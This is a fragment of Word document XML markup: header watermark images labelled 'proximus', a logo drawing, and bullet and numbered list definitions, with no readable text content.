      <w:pict w14:anchorId="38D9D3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6126" o:spid="_x0000_s2050" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251655168;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus"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211CC" w14:textId="548B2B19" w:rsidR="00B70BCA" w:rsidRPr="00760F4D" w:rsidRDefault="00C61995" w:rsidP="002F7918">
    <w:pPr>
      <w:pStyle w:val="Text"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:pict w14:anchorId="7A013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6127" o:spid="_x0000_s2051" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251654144;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus" gain="19661f" blacklevel="22938f"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00B70BCA" w:rsidRPr="002E5525">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792C3299" wp14:editId="2F9E02A8">
          <wp:extent cx="2165299" cy="416072"/>
          <wp:effectExtent l="0" t="0" r="698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65299" cy="41607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B72BB" w14:textId="7CF726BC" w:rsidR="00B70BCA" w:rsidRDefault="00C61995">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:pict w14:anchorId="3095E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6125" o:spid="_x0000_s2049" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251656192;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus" gain="19661f" blacklevel="22938f"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00B70BCA">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26AA4A94" wp14:editId="4B6F54D5">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-527024</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-172085</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5346111" cy="7556602"/>
          <wp:effectExtent l="0" t="0" r="6985" b="635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46111" cy="755660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1D6757" w14:textId="42125470" w:rsidR="00C61995" w:rsidRDefault="00C61995">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:pict w14:anchorId="543E32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6129" o:spid="_x0000_s2053" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251652096;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus"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5C1E3" w14:textId="0D4BF829" w:rsidR="00C61995" w:rsidRDefault="00C61995">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:pict w14:anchorId="367BF6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6130" o:spid="_x0000_s2054" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251651072;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus"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AAF0C" w14:textId="39E55B13" w:rsidR="00B70BCA" w:rsidRDefault="00C61995">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:pict w14:anchorId="2EE3B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6128" o:spid="_x0000_s2052" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:337.5pt;height:422.3pt;z-index:-251653120;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="proximus"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3448EA4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="0A94D6"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01C221AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19CC0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F518BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="655A920E"/>
    <w:lvl w:ilvl="0" w:tplc="72DCC256">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="0A94D6"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2006"/>
        </w:tabs>
        <w:ind w:left="2006" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2726"/>
        </w:tabs>
        <w:ind w:left="2726" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3446"/>
        </w:tabs>
        <w:ind w:left="3446" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4166"/>
        </w:tabs>
        <w:ind w:left="4166" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4886"/>
        </w:tabs>
        <w:ind w:left="4886" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5606"/>
        </w:tabs>
        <w:ind w:left="5606" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6326"/>
        </w:tabs>
        <w:ind w:left="6326" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7046"/>
        </w:tabs>
        <w:ind w:left="7046" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09A359E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48EE3AE4"/>
    <w:lvl w:ilvl="0" w:tplc="C24EE29E">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times New Roman" w:hAnsi="Utopia Std"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D23B42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85A48878"/>
    <w:lvl w:ilvl="0" w:tplc="CF3A80A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet5"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1492"/>
        </w:tabs>
        <w:ind w:left="1492" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="0A94D6"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2289"/>
        </w:tabs>
        <w:ind w:left="2289" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3009"/>
        </w:tabs>
        <w:ind w:left="3009" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3729"/>
        </w:tabs>
        <w:ind w:left="3729" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4449"/>
        </w:tabs>
        <w:ind w:left="4449" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5169"/>
        </w:tabs>
        <w:ind w:left="5169" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5889"/>
        </w:tabs>
        <w:ind w:left="5889" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6609"/>
        </w:tabs>
        <w:ind w:left="6609" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7329"/>
        </w:tabs>
        <w:ind w:left="7329" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0DAC366F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F124A0F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1B2200B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFC31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230325"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5CE6BB8"/>
    <w:lvl w:ilvl="0" w:tplc="FE0A849A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times New Roman" w:hAnsi="Utopia Std" w:cs="Times New Roman"/>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BB3BDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A729DBA"/>
    <w:lvl w:ilvl="0" w:tplc="6B643288">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F8AC8DC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="420E9D42" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="66344BC4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0D6086A2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7A28E658" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4618878A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4BDCC22C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8ECE0316" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii=".AppleSystemUIFont" w:hAnsi=".AppleSystemUIFont" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="18DE446F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A28C36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3A7365"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A1432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8C38F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39E43E44"/>
    <w:lvl w:ilvl="0" w:tplc="CE2890FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times New Roman" w:hAnsi="Utopia St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4F5B78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA44A178"/>
    <w:lvl w:ilvl="0" w:tplc="0A4A16C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Referencereference"/>
      <w:lvlText w:val="[RD-%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="907"/>
        </w:tabs>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>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FAF1B6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71E252F4"/>
    <w:lvl w:ilvl="0" w:tplc="18EC8658">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Appendix"/>
      <w:lvlText w:val="Appendix %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="99999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36B53FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="207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CF100E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39C486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232BAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F124A0F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FE90EB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25BCE7D0"/>
    <w:lvl w:ilvl="0" w:tplc="7C9A98B6">
      <w:start w:val="192"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times New Roman" w:hAnsi="Utopia St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F6236F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CF049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4F4078A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9681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5A5BE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE50190E"/>
    <w:lvl w:ilvl="0" w:tplc="5AE2FE14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet2"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="712"/>
        </w:tabs>
        <w:ind w:left="712" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="0A94D6"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1724"/>
        </w:tabs>
        <w:ind w:left="1724" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2444"/>
        </w:tabs>
        <w:ind w:left="2444" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3164"/>
        </w:tabs>
        <w:ind w:left="3164" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3884"/>
        </w:tabs>
        <w:ind w:left="3884" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4604"/>
        </w:tabs>
        <w:ind w:left="4604" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5324"/>
        </w:tabs>
        <w:ind w:left="5324" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6044"/>
        </w:tabs>
        <w:ind w:left="6044" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF"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4CA06691"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D34E1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975665"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F54ADA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0DD7192"/>
    <w:multiLevelType w:val="multilevel"/>
